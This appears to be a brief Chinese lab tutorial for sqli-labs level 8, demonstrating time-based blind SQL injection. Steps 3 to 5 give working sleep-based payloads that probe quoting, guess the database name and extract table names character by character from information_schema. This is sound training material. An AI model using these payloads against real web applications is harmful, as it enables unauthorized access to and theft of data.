1、首先我们使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第八关系统正常运行如下。
2、使用单引号、双引号、加括号测试都为同样的界面,没有提示出错。
3、添加sleep观察,Id=1' and sleep(10) --+ Id=1') and sleep(10) --+ Id=1" and sleep(10) --+ Id=1") and sleep(10) --+ 其中Id=1' and sleep(10) --+执行后10秒之后刷新,推测sql语句为select * from table where id ='input'。
4、使用猜解语句进行测试id' and (select if((select database())='security',sleep(10),NULL)) --+。
5、可以使用复杂的语句通过ascii来测试id=1' and (select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=111,sleep(10),NULL))--+
